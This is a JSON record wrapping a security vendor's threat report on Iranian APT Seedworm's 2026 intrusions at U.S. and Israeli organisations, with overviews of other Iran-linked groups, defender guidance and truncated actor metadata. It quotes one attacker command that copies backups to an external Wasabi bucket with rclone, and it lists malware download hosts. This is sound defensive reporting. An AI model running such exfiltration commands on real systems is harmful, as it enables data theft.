{
	"id": "d9769176-0c0c-4040-a819-62545cbad3af",
	"created_at": "2026-04-06T00:14:31.669205Z",
	"updated_at": "2026-04-10T03:35:19.87186Z",
	"deleted_at": null,
	"sha1_hash": "f77e3b05ceeff8819d6be2144932817ad3edc2a7",
	"title": "Seedworm: Iranian APT on Networks of U.S. Bank, Airport, Software Company",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 113216,
	"plain_text": "Seedworm: Iranian APT on Networks of U.S. Bank, Airport,\r\nSoftware Company\r\nBy About the Author\r\nArchived: 2026-04-05 21:14:23 UTC\r\nActivity associated with Iranian APT group Seedworm has been spotted on the networks of multiple U.S.\r\ncompanies. The activity began in February 2026 and has continued in recent days. \r\nA U.S. bank, airport, non-profit and the Israeli operations of a U.S. software company were among the\r\ntargets. \r\nWe round up details of recent Iranian cyber threat activity and what defenders need to look out for.\r\nThe Iranian APT group Seedworm (aka MuddyWater, Temp Zagros, Static Kitten) has been active on the networks\r\nof multiple U.S. companies since the beginning of February 2026, with activity continuing in recent days\r\nfollowing U.S. and Israeli military strikes on Iran that have sparked conflict in the region. \r\nA U.S. bank, software company and airport, and non-governmental organizations in both the U.S. and Canada,\r\nhave experienced suspicious activity on their networks in recent days and weeks. The software company is a\r\nsupplier to the defense and aerospace industries among others, and has a presence in Israel, with the company’s\r\nIsrael operation seeming to be the target in this activity.   \r\nA previously unknown backdoor, which we have named Dindoor, was found on the networks of the Israeli outpost\r\nof this software company, with the same backdoor seen on the networks of a U.S. bank and the Canadian non-profit organization. This backdoor leverages Deno, the secure runtime for JavaScript and TypeScript, to execute.\r\nThis backdoor was signed with a certificate issued to “Amy Cherne”.\r\nThere was also an attempt to exfiltrate data from the software company using Rclone to a Wasabi cloud storage\r\nbucket. 
It’s not clear if this was successful.\r\nrclone copy CSIDL_DRIVE_FIXED\\backups wasabi:[REMOVED]:/192.168.0.x\r\nA different, Python backdoor called Fakeset was found on the networks of the U.S. airport and non-profit. It was\r\nsigned by certificates issued to “Amy Cherne” and “Donald Gay”. The Donald Gay certificate has been used\r\npreviously to sign malware linked to Seedworm. The backdoor was downloaded from two servers belonging to the\r\nBackblaze cloud storage company:\r\ngitempire.s3.us-east-005.backblazeb2.com\r\nelvenforest.s3.us-east-005.backblazeb2.com\r\nThe Donald Gay certificate was also used to sign a sample from the malware family we call Stagecomp and which\r\ndownloads the Darkcomp backdoor. The Stagecomp and the Darkcomp malware have been linked to Seedworm\r\nby vendors including Google, Microsoft and Kaspersky. While this malware wasn’t seen on the targeted networks,\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 1 of 13\n\nthe use of the same certificates suggests the same actor - namely Seedworm - was behind the activity on the\r\nnetworks of the U.S. companies.\r\nWhile it’s not known if the operations of Seedworm are disrupted by the current conflict, already having a\r\npresence on U.S. and Israeli networks prior to the current hostilities beginning means the threat group is in a\r\npotentially dangerous position to launch attacks. While we have disrupted these breaches, other organizations\r\ncould still be vulnerable to attack.  \r\nSeedworm is a long-standing Iranian threat group, which usually mounts classic espionage attacks for the\r\npurposes of spying and information gathering. 
Active since 2017, CISA has said that Seedworm is “a subordinate\r\nelement within the Iranian Ministry of Intelligence and Security (MOIS).” Seedworm originally focused on\r\nvictims in the Middle East but later broadened its scope to target telecommunications, defense, local government,\r\nand oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own\r\ncustom malware as well as using dual-use and living off the land tools.\r\nContext\r\nOn February 28, 2026, the U.S. and Israel launched a coordinated offensive military air operation targeting Iran,\r\nleading to the death of Iran’s Supreme Leader Ayatollah Ali Khamenei, who was apparently killed on March 1\r\nwhen a U.S./Israeli airstrike hit his compound. Several other high-ranking Iranian officials, as well as multiple\r\ncivilians, were also killed in strikes.\r\nIn retaliation, Iran launched drones and ballistic missiles at adversaries throughout the Gulf region, including\r\ntargeting Israel and U.S. military and diplomatic outposts in multiple countries in the region.\r\nBecause of the heated tension in the region and ongoing attacks, it is likely Iran and its allies may also initiate\r\ncyber operations to further target their adversaries. Both Israel and Iran have a history of carrying out destructive\r\ncyberattacks, including against each other. While internet access in Iran may be disrupted by current military\r\noperations, there are cyber operatives working for the regime based in other countries. \r\nThe UK’s National Cyber Security Centre released an alert following this recent activity, stating that “Iranian state\r\nand Iran-linked cyber actors almost certainly currently maintain at least some capability to conduct cyber activity”\r\nand warning about the potential threat posed by “Iran-linked hacktivists”. 
Check Point also reported recently that\r\nthe Handala threat group (see below) has been using the Starlink satellite network to stay online even before this\r\nmost recent activity began, with the group reportedly leveraging the technology since mid-January, when a\r\nnationwide Internet shutdown was announced by Iran’s government.  \r\nExamining the cyber activity typically carried out by threat actors associated with Iran and its allies may help us\r\npredict the kinds of cyber operations we may see being executed as this conflict continues. \r\nIranian threat actors have become increasingly proficient in recent years. Not only has their tooling and malware\r\nimproved, but they’ve also demonstrated strong social engineering capabilities, including spear-phishing\r\ncampaigns and “honeytrap” operations used to build relationships with targets of interest to gain access to\r\naccounts or sensitive information.\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 2 of 13\n\nOne of the hallmarks of Iran’s operations in cyberspace is that it periodically mounts destructive attacks against\r\norganizations in countries it deems hostile, which at the moment would obviously include the U.S. and Israel. That\r\ncreates a risk for organizations in those countries because these attacks are about sending a message rather than\r\nstealing information, which means that any organization in the country targeted could be in the firing line. \r\nOther recent activity\r\nDoxing Israeli officials and regional energy sector participants\r\nHandala is an Iranian-aligned hacktivist group that is also known to operate in support of Palestine. They have\r\nbeen active since at least 2024. They are known for conducting attacks targeting Israeli organizations and entities\r\nperceived to support Israel by conducting phishing attacks, data theft, ransomware, extortion and destructive\r\nattacks, including the use of custom wipers. 
The group operates a leaks site where victim names are posted\r\nalongside stolen data and messages from the group. The group was also reportedly active on multiple underground\r\ncybercrime forums including BreachForums, Ramp and Exploit during its early days, but has since become more\r\nactive on Telegram channels and X (formerly Twitter). \r\nIn December 2025, the group claimed to have compromised the mobile devices of former Israeli Prime Minister\r\nNaftali Bennett and Benjamin Netanyahu's Chief of Staff, Tzachi Braverman. The group leaked material they said\r\nthey had stolen from the phones, including the contact information of prominent Israeli officials, journalists and\r\nbusiness people, photos and videos. However, analysis by researchers disputed some of these claims, saying that\r\nthe attacks appeared to be limited to Telegram accounts, and did not achieve complete phone access.  \r\nIn February 2026, Handala claimed to have breached one of Israel's largest healthcare networks. Meanwhile, in\r\nMarch 2026, the group said it had breached Sharjah National Oil Corporation and Israel Opportunity Energy,\r\nexfiltrating more than 1.3TB of sensitive data, including confidential financial data, oil contracts and project\r\ndetails. The group has also made claims about breaching Saudi Arabian energy company Saudi Aramco in a post\r\non its leaks site. However, the documents shared appeared to consist of older files that were already in circulation\r\npreviously. This raises the possibility that the claim may have been exaggerated or partially fabricated, potentially\r\nrepresenting an influence or psychological operation intended to generate attention, panic or reputation damage.\r\nThe group has also posted messages claiming that Israeli Prime Minister Benjamin Netanyahu will be their next\r\ntarget. 
\r\nSpearphishing academics and NGOs for intelligence collection\r\nIn an October 2025 campaign, Seedworm carried out a sophisticated spear-phishing attack that used a\r\ncompromised mailbox to distribute a custom backdoor known as Phoenix to international organizations across the\r\nMiddle East and North Africa (MENA), targeting more than 100 government entities as part of an espionage\r\ncampaign.\r\nThe attackers leveraged a malicious Office attachment that has technical overlap with previously reported\r\nSeedworm attacks to deliver Phoenix. The command \u0026 control (C\u0026C) server also reportedly hosted the PDQ\r\nremote access tool, which was used for remote access and persistence, as well as a custom browser credential\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 3 of 13\n\nstealer. It is believed the motive behind these attacks was intelligence collection, as well as persistent access, for\r\nthe purposes of longer-term espionage and exfiltration.\r\nElsewhere, in November 2025, Seedworm was also linked to attacks that targeted academics with expertise on the\r\nMiddle East and other foreign policy experts. This activity took place between June and August 2025. Suspicious\r\nspear-phishing emails impersonated Suzanne Maloney – the vice president and director of the Foreign Policy\r\nprogram at the Brookings Institution and an expert on Iran – using a Gmail address and a misspelled version of\r\nher name - “Suzzane Maloney.”. In the attacks, the actors started out using a benign email, which eventually led to\r\na subsequent email that contained a malicious link to a remote access tool payload. It is likely these attacks were\r\ncarried out as a means to perform espionage - more specifically, as a means to gather intelligence that could be\r\nleveraged for strategic advantage. 
\r\nThese attacks had TTP overlaps with other Iranian aligned groups (Smoke Sandstorm, Mint Sandstorm/Charming\r\nKitten) but were subsequently attributed to Seedworm.\r\nOther 2025 activity\r\nCamera scanning for intelligence gathering\r\nMarshtreader (Pink Sandstorm, Agrius, Agonizing Serpens) is a group that has been active since 2020 and is\r\nreportedly linked to Iran’s Ministry of Intelligence and Security (MOIS). It is known for its destructive operations\r\nagainst countries in the Middle East, specifically Israel, conducting attacks under multiple aliases and leveraging\r\ndata leaks in order to control and shape narratives using wiper and fake ransomware malware. \r\nIn June 2025, it was reported that the group was observed scanning for vulnerable cameras using CVE-2023-6895\r\nand CVE-2017-7921 across Israel during the June 2025 conflict using infrastructure associated with Iranian\r\nactors. \r\nIn previous conflicts, actors have been observed compromising cameras to gather intelligence to support bombing\r\ndamage assessment (BDA) by providing near-real time visibility of impact from bombings and strikes. It is likely\r\nthese attacks were conducted to gain similar visibility into sensitive locations to perform reconnaissance and\r\npotentially enable follow-on targeting of high value targets. \r\nAdditionally, in June 2025, a successful password-spraying attack conducted from Nord VPN infrastructure\r\nagainst Israeli municipal government entities was reported followed by spear-phishing attacks that contained links\r\nto a ClickFix page designed to trick users into executing malicious PowerShell to ultimately deliver a remote\r\naccess tool (RAT) that can execute arbitrary commands by the attackers. It is likely the motive behind these\r\nattacks was account compromise and espionage. It is not clear what actor was behind these attacks, but the\r\ntargeting of Israeli targets points to an Iranian actor as the most likely perpetrator. 
\r\nDieNet DDoS attacks \r\nDieNet is a pro-Palestinian hacktivist group that emerged on Telegram around March 2025 and announced its\r\nintention to target “outlaw sites and corrupt government platforms” using DDoS attacks. \r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 4 of 13\n\nFollowing the arrest of activist Mahmoud Khalil, its activities intensified, with the group claiming responsibility\r\nfor multiple DDoS attacks against U.S. critical infrastructure, including energy, financial, healthcare, government,\r\ntransit and communication systems. \r\nIn its attacks, the group leveraged high-volume DDoS attacks reportedly via DDoS-as-a-service infrastructure,\r\nincluding TCP RST, DNS amplification, TCP SYN floods and NTP amplification attacks, as well as website\r\ndefacements and data breaches.  \r\nBased on reporting, its motives were likely political retaliation and service disruption.\r\nWhat can we expect next?\r\nGiven Iran's history of attacks leveraging destructive wipers, distributed-denial-of-service (DDoS) and hack-and-leak attacks, the likely next steps for the nation’s cyber actors and supporters may be multiple campaigns\r\ncombining high-visibility disruption for political signaling and lower-visibility access operations for strategic\r\nleverage.\r\nDefenders should anticipate noisy activity such as DDoS attacks, defacements, and leak claims targeting\r\ngovernment, transportation, energy and defense contractors to amplify psychological and economic pressure. \r\nIt is also likely that more capable state-aligned groups will continue credential harvesting operations, along with\r\nvulnerability exploitation and covert persistence against critical infrastructure to generate immediate impact, while\r\nalso positioning themselves for potential future destructive, espionage or coercive operations.  
\r\nDDoS and defacements\r\nGiven the increase in \"hacktivist\" activity, we predict a surge in DDoS and defacements for fast signaling and\r\nmedia impact, similar to what has been observed recently with Handala’s claims of targeting critical national\r\ninfrastructure (CNI). \r\nIt is likely such attacks would target a range of sectors, including government portals, municipal sites,\r\nairports/ports, logistics providers, banks, telcos, media and symbolic brands. \r\nPassword spraying and mailbox compromises\r\nOver the last year, multiple reports involving Iran-backed groups repeatedly highlighted credential attacks and\r\nmailbox compromises as a means of initial access and intelligence gathering. \r\nTargets could include defense organizations, government, contractors and NGOs. Additionally, adjacent\r\norganizations that support base operations, including fuel, catering, logistics, and communications could also be\r\ntargets of these attacks.\r\nLeaks / intimidation operations / psyops\r\nHacktivists such as Handala repeatedly use leaks and claims to amplify fear and pressure even when access is only\r\npartial - this is key escalation behavior.\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 5 of 13\n\nPotential targets of these kinds of attacks and claims would likely include healthcare, local government,\r\nairports/ports, transportation and education, as well as high-profile individuals tied to defense, politics and media. \r\nCritical infrastructure and opportunistic attacks\r\nGiven the current escalations between the U.S. and Iran, it is likely that CNI is at high risk of attack, as well as\r\norganizations supporting these entities. \r\nOrganizations with exposed terminal operating systems, schedules and trucking/rail interfaces may be targeted, as\r\nwell as passenger processing systems, baggage systems, and contractor networks. 
Additionally, given the high\r\nrisk, other organizations that operate within sectors such as energy/fuel supply chains may be targets. \r\nDestructive attacks\r\nIran has previously exhibited high capabilities in destructive potential, particularly during escalation windows. \r\nAny attacks would likely to be focused on energy and utilities, transportation and logistics, financial sector,\r\ntelecoms, healthcare, defense contractors and military suppliers. \r\nHow can defenders prepare?\r\nOrganizations should prepare by focusing on strengthening monitoring capabilities and ensure resilience across\r\ntheir infrastructure where possible. Early indicators such as vulnerability scanning, credential attacks and\r\nreconnaissance activity often provide an opportunity for defenders to detect intrusion attempts early in the attack\r\nchain.\r\nDDoS and defacement campaigns\r\nDue to the likelihood of early retaliation and intensifying psyops, defenders should expect attempts to disrupt\r\npublic-facing services and monitor any internet-facing infrastructure for the following:\r\nSpikes in HTTP requests from large, distributed IP ranges\r\nRepeated probing of admin portals \r\nExploit attempts targeting web frameworks and content management systems\r\nScanning activity against exposed API endpoints\r\nTo prepare, organizations should look at performing the following:\r\nDeploy web application firewalls (WAF) with updated rule sets\r\nEnable DDoS protection via CDN or upstream filtering services\r\nDecommission any non-essential or unused publicly accessible services \r\nEnsure all up-to-date patches for web applications/plugins are applied regularly \r\nEnsure website backups exist for rapid restoration, if required\r\nMonitor underground forums, Telegram channels and social media for claims involving your organization\r\nCredential attacks\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 6 of 13\n\nCredential attacks are one of the 
most common initial access techniques used by Iranian-linked groups, which\r\ninclude attack attempts against multiple public-facing services.\r\nDefenders should ensure monitoring is in place to identify patterns consistent with password-spraying attempts,\r\nsuch as the following:\r\nRepeated login failure attempts across multiple users\r\nAuthentication attempts from unusual geographic locations\r\nMFA fatigue attacks\r\nLogin attempts occurring outside of normal working hours \r\nVulnerability scanning and exploitation of vulnerable VPN appliances or edge infrastructure\r\nDeployment of web shells on internet-facing servers\r\nCredential harvesting through phishing campaigns\r\nOrganizations should review and harden any identity security mechanisms by performing the following:\r\nEnable multi-factor authentication for all remote access\r\nDisable legacy authentication protocols\r\nImplement condition access policies based on location and device risk\r\nRestrict admin logins to specific locations, where possible\r\nMonitor identity provider logs for any anomalies\r\nLeak campaigns and intimidation operations\r\nHacktivist groups often use hack-and-leak campaigns designed to gain media attention and apply psychological\r\npressure, usually via partial data leaks and exaggerated breach claims. Security teams should watch for indicators\r\nof data staging or exfiltration, such as the following:\r\nUnusual downloads from email systems\r\nUnusual access to document repositories\r\nSuspicious archive creation (e.g. ZIP, RAR) on internal systems, usually involving collection of multiple\r\nfile types \r\nLarge outbound data transfers to external cloud storage platforms \r\nUnexpected use of data-transfer applications (e.g. 
Rclone) in their environment\r\nOrganizations should focus on ensuring monitoring is in place for the following:\r\nLarge outbound data transfers\r\nImplement data loss prevention (DLP) policies\r\nRestrict access to external cloud storage platforms\r\nEnable auditing of email and file access\r\nHaving a communications plan for potential leak claims can also help organizations respond quickly to these\r\nthreats. \r\nAttacks on critical infrastructure\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 7 of 13\n\nCritical infrastructure organizations and companies that support military logistics may face attacks that attempt to\r\ncompromise the following:\r\nOperational Technology (OT) interfaces \r\nScheduled and logistics systems\r\nContractor networks\r\nRemote management systems\r\nSecurity teams should ensure adequate monitoring is in place for:\r\nAbnormal access to ICS\r\nUnexpected remote connections to operational networks\r\nAuthentication attempts targeting infrastructure management systems\r\nUnusual configuration changes in critical systems\r\nVendor access and contractor networks\r\nOrganizations faced with these attacks, at a minimum, should ensure:\r\nNetwork segmentation across operational technology networks\r\nRestrict remote access to infrastructure systems\r\nMonitor contractor VPN access\r\nMaintain offline backups of critical configuration systems\r\nDestructive attacks\r\nIran has repeatedly demonstrated its destructive capabilities in the past, with attacks such as Shamoon, which\r\ntargeted Saudi Arabia's oil industry to wipe thousands of systems. 
\r\nOrganizations that anticipate such attacks should ensure they monitor for indicators that attackers may be\r\npreparing for a destructive operation such as:\r\nMass scheduled task creation \r\nAttempts to disable security applications \r\nDeletion of shadow copies or backup data\r\nUnusual administrative commands executed across multiple hosts\r\nOrganizations should prioritize resilience against destructive attacks by conducting the following tasks:\r\nIsolating backup infrastructure from production networks\r\nEnable immutable backups\r\nTest disaster recovery procedures regularly\r\nEnsuring systems can be restored quickly is critical to recovering from the impact of destructive attacks. \r\nHistorical activity\r\nStuxnet\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 8 of 13\n\nOne of the most infamous cyber incidents to ever take place in the Middle East region was the deployment of the\r\nStuxnet worm, which was designed to break laboratory equipment used by Iranian scientists to enrich uranium at\r\nthe Natanz facility in Iran. Iran has claimed that this facility has been hit in strikes by Israel and the U.S. in recent\r\ndays. The disruption of Iran’s nuclear program to prevent the country from developing nuclear weapons was one\r\nof the reasons given by the U.S. administration for carrying out these recent strikes. The facility was also hit in\r\nU.S. strikes in June 2025, which were believed at the time to have rendered the facility inoperable. \r\nStuxnet was among the first known major nation-state cyberattacks that demonstrated hackers’ ability to\r\nmanipulate and even destroy physical equipment. Stuxnet was designed to cause the spinning motors at the bottom\r\nof Natanz's enrichment centrifuges to shatter. It was first published about by researchers at Symantec in 2010,\r\nafter the worm spread outside of the Natanz facility and was found on private networks. 
Given that Stuxnet was\r\nonly discovered after penetrating private networks, it is quite possible that cyber operations are currently being\r\nleveraged by and against infrastructure that we know nothing about - yet.\r\nReports last year indicated potential cyber warfare impacting the region then too, including an attack by pro-Israel\r\nhackers dubbed Predatory Sparrow on Iranian crypto exchange Nobitex in which the attackers drained $90 million\r\nof cryptocurrency from the exchange. There were also reports that Iranian group Damselfly was carrying out a\r\ntargeted phishing campaign focused on high-profile Israeli individuals, particularly prominent academics,\r\njournalists, and security researchers (See more in Damselfly profile).\r\nDamselfly is just one of the key cyber actors who may be active in the current conflict, potentially targeting the\r\nnetworks of significant institutions in other nations for espionage, disruptive or destructive purposes. \r\nOther key actors\r\nDruidfly\r\nDruidfly (aka Homeland Justice, Karma) is an Iranian attack group that specializes in disk-wiping attacks. It first\r\ncame to public attention after a July 2022 wiper attack on multiple targets belonging to the government of\r\nAlbania. The wiper left messages directed against the Mujahideen E-Khalq (MEK), an Iranian dissident\r\norganization based in Albania. Shortly afterward, a group calling itself Homeland Justice claimed credit for the\r\nattack.\r\n In response to the attack, Albania broke off diplomatic relations with Iran. This triggered another wave of attacks\r\nin September 2022, apparently in retaliation for Albania publicly attributing the attacks to Iran. While Homeland\r\nJustice purported to be a hacktivist outfit, the FBI later established that “Iranian state cyber actors” were\r\nresponsible for the attacks. 
\r\nDruidfly reappeared in 2023, when it began targeting Israel with a wiper called BibiWiper, seemingly named after\r\nIsraeli Prime Minister Benjamin Netanyahu, whose nickname is “Bibi” (See Case Study).\r\nOn June 20, 2025, when hostilities between Iran and Israel were previously at a high, we tweeted that we had seen\r\na Druidfly wiper targeting organizations in Albania. The wiper was signed with a legitimate certificate, which was\r\nprobably stolen. On the Monday following (June 23), it was reported in the media that public services in Albania’s\r\ncapital Tirana had been disrupted by a cyber attack that took down the city’s official website and affected local\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 9 of 13\n\ngovernment operations. Homeland Justice claimed credit for the attack and said it had taken down the city’s\r\nofficial website, exfiltrated data and wiped servers, citing the presence of MEK in the country as the reason for the\r\nattack.\r\nCase study: Druidfly attacks on Israeli targets\r\nFollowing the escalation of the conflict in Gaza in 2023, Druidfly was linked to a series of wiper attacks against\r\nmultiple targets in Israel. In this case, the attacks were carried out under a persona called Karma that purports to\r\nbe a hacktivist group sympathetic to the Palestinian cause. \r\nThe wiper deployed in these attacks was called BibiWiper, seemingly named after Israeli Prime Minister\r\nBenjamin Netanyahu, whose nickname is Bibi. The wiper encrypted files on the hard disk before overwriting the\r\nmaster boot record (MBR) and crashing the computer. Efforts to restart the computer would fail because of the\r\ndestruction of the MBR. 
Analysis of the wiper revealed clear anti-Israel messages within the wiper’s code.\r\nFurthermore, analysis of BibiWiper by the Threat Hunter Team found clear similarities between it and wipers\r\ndeployed by Druidfly during attacks against Albania in 2022 and 2023.\r\nTracing other tools used to initiate the BibiWiper attacks against Israel revealed the following overlap in tactics,\r\ntechniques, and procedures between these attacks and earlier Druidfly attacks:\r\nHTTPSnoop malware was previously deployed prior to the Druidfly wiping attacks\r\nUse of the remote desktop tools AnyDesk and ScreenConnect\r\nUse of ReGeorg web shells\r\nDamselfly\r\nDamselfly (aka Charming Kitten, Mint Sandstorm) is an Iranian espionage group that has been active since 2014.\r\nIt was initially known for targeting Israel with attacks before it broadened its focus to include the U.S. and other\r\ncountries. While the group is principally known to be involved in intelligence gathering, members of the group are\r\nalso known to have participated in extortion attacks. It has been linked by multiple vendors with Iran’s Islamic\r\nRevolutionary Guard Corps (IRGC).\r\nIn March 2022, Damselfly was one of several Iranian groups reported to have moved into mounting large-scale\r\nsocial engineering campaigns. Consistent features of these campaigns included the use of charismatic sock\r\npuppets, lures of prospective job opportunities, solicitation by journalists, and masquerading as think tank experts\r\nseeking opinions. 
The attackers leveraged networks such as LinkedIn, Facebook, Twitter, and Google.\r\nDamselfly has also been linked to an attack targeting a nuclear security expert at a U.S.-based think tank in July\r\n2023; attacks on Israel’s transportation, logistics, and technology sectors in November 2023; as well as a January\r\n2024 campaign targeting individuals working on Middle Eastern affairs at universities and research organizations\r\nin Belgium, France, Gaza, Israel, the UK, and the U.S. The attackers in that campaign used bespoke phishing lures\r\nthemed around the Israel-Hamas conflict to trick targets into downloading malware.\r\nIn 2025, Check Point reported that a new Damselfly campaign that began in mid-June 2025 targeted Israeli\r\njournalists, cyber security experts and computer science professors from leading Israeli universities with spear\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 10 of 13\n\nphishing campaigns in an attempt to steal credentials and multi-factor authentication codes in order to gain access\r\nto targets’ email accounts. Some of the victims were approached by attackers who posed as fictitious assistants to\r\ntechnology executives or researchers through emails and WhatsApp messages.\r\nMantis\r\nActive since at least 2014, Mantis (aka Desert Falcon, Arid Viper, APT-C-23), is an Arabic speaking group that\r\nappears to be based in the Gaza Strip. The group is known to mount espionage attacks against targets in the\r\ngovernment, military, media, financial, research, education, and energy sectors. Most of its attacks have been\r\nagainst organizations in the Middle East but it has, on occasion, attacked targets outside the region. It has also\r\nbeen known on occasion to target individuals or organizations internally within Gaza. While other vendors have\r\nlinked the group to Hamas, the Threat Hunter Team cannot make a definitive attribution to any Palestinian\r\norganization. 
\r\nThe group mainly favors spear-phishing emails with malicious attachments or links to malicious files as its main\r\ninfection vector. Mantis uses custom malware and its most recent toolset includes the backdoors Trojan.Micropsia\r\nand Trojan.AridGopher. Micropsia is capable of taking screenshots, keylogging, and archiving certain file types\r\nusing WinRAR in preparation for data exfiltration. However, its main purpose appears to be running secondary\r\npayloads for the attackers. Arid Gopher is a modular backdoor that is written in Go. It appears to be regularly\r\nupdated and rewritten by the attackers, most likely to evade detection.\r\nThese tools were used in a Mantis attack in late 2022/early 2023 that targeted organizations within the Palestinian\r\nterritories. The initial infection vector for this campaign remains unknown, but both the Micropsia and\r\nAridGopher malware were deployed in this attack. In one intrusion, the attackers deployed three distinct versions\r\nof the same toolset (that is, different variants of the same tools) on three groups of computers.\r\nCompartmentalizing the attack in this fashion was likely a precautionary measure. If one toolset was discovered,\r\nthe attackers would still have a persistent presence on the target’s network. 
\r\nIndicators of Compromise (IOCs)\r\nNetwork Indicators\r\nFurther Reading\r\nWe published a whitepaper in 2024 discussing the cyber activity we typically see emanating from this region titled Conflict in the Middle East: An Overview of Cyber Threat Actors and Risks.\r\nSource: https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us"
	],
	"report_names": [
		"iran-cyber-threat-activity-us"
	],
	"threat_actors": [
		{
			"id": "82b92285-4588-48c9-8578-bb39f903cf62",
			"created_at": "2022-10-25T15:50:23.850506Z",
			"updated_at": "2026-04-10T02:00:05.418577Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"Charming Kitten"
			],
			"source_name": "MITRE:Charming Kitten",
			"tools": [
				"DownPaper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d8af157e-741b-4933-bb4a-b78490951d97",
			"created_at": "2023-01-06T13:46:38.748929Z",
			"updated_at": "2026-04-10T02:00:03.087356Z",
			"deleted_at": null,
			"main_name": "APT35",
			"aliases": [
				"COBALT MIRAGE",
				"Agent Serpens",
				"Newscaster Team",
				"Magic Hound",
				"G0059",
				"Phosphorus",
				"Mint Sandstorm",
				"TunnelVision"
			],
			"source_name": "MISPGALAXY:APT35",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "ad78338e-8bb6-4745-acae-27d3cc3cf76d",
			"created_at": "2023-11-17T02:00:07.580677Z",
			"updated_at": "2026-04-10T02:00:03.452097Z",
			"deleted_at": null,
			"main_name": "Bohrium",
			"aliases": [
				"BOHRIUM",
				"IMPERIAL KITTEN",
				"Smoke Sandstorm"
			],
			"source_name": "MISPGALAXY:Bohrium",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3ce91297-e4c0-4957-8dd7-9047a3e23dc7",
			"created_at": "2023-01-06T13:46:39.054248Z",
			"updated_at": "2026-04-10T02:00:03.197801Z",
			"deleted_at": null,
			"main_name": "Tortoiseshell",
			"aliases": [
				"Yellow Liderc",
				"Imperial Kitten",
				"Crimson Sandstorm",
				"Cuboid Sandstorm",
				"Smoke Sandstorm",
				"IMPERIAL KITTEN",
				"TA456",
				"DUSTYCAVE",
				"CURIUM"
			],
			"source_name": "MISPGALAXY:Tortoiseshell",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "21e01940-3851-417f-9e90-1a4a2da07033",
			"created_at": "2022-10-25T16:07:23.299369Z",
			"updated_at": "2026-04-10T02:00:04.527895Z",
			"deleted_at": null,
			"main_name": "Agrius",
			"aliases": [
				"AMERICIUM",
				"Agonizing Serpens",
				"BlackShadow",
				"DEV-0227",
				"Pink Sandstorm",
				"SharpBoys",
				"Spectral Kitten"
			],
			"source_name": "ETDA:Agrius",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agrius",
				"BFG Agonizer",
				"BFG Agonizer Wiper",
				"DEADWOOD",
				"DETBOSIT",
				"Detbosit",
				"IPsec Helper",
				"Moneybird",
				"MultiLayer Wiper",
				"PW",
				"PartialWasher",
				"PartialWasher Wiper",
				"SQLShred",
				"Sqlextractor"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9ff60d4d-153b-4ed5-a2f7-18a21d2fa05d",
			"created_at": "2022-10-25T16:07:23.539852Z",
			"updated_at": "2026-04-10T02:00:04.647734Z",
			"deleted_at": null,
			"main_name": "Desert Falcons",
			"aliases": [
				"APT-C-23",
				"ATK 66",
				"Arid Viper",
				"Niobium",
				"Operation Arid Viper",
				"Operation Bearded Barbie",
				"Operation Rebound",
				"Pinstripe Lightning",
				"Renegade Jackal",
				"TAG-63",
				"TAG-CT1",
				"Two-tailed Scorpion"
			],
			"source_name": "ETDA:Desert Falcons",
			"tools": [
				"AridSpy",
				"Barb(ie) Downloader",
				"BarbWire",
				"Desert Scorpion",
				"FrozenCell",
				"GlanceLove",
				"GnatSpy",
				"KasperAgent",
				"Micropsia",
				"PyMICROPSIA",
				"SpyC23",
				"Viper RAT",
				"ViperRAT",
				"VolatileVenom",
				"WinkChat",
				"android.micropsia"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4134675e-5b72-4b50-8d70-1a8f18aafbb4",
			"created_at": "2024-10-04T02:00:04.766263Z",
			"updated_at": "2026-04-10T02:00:03.715945Z",
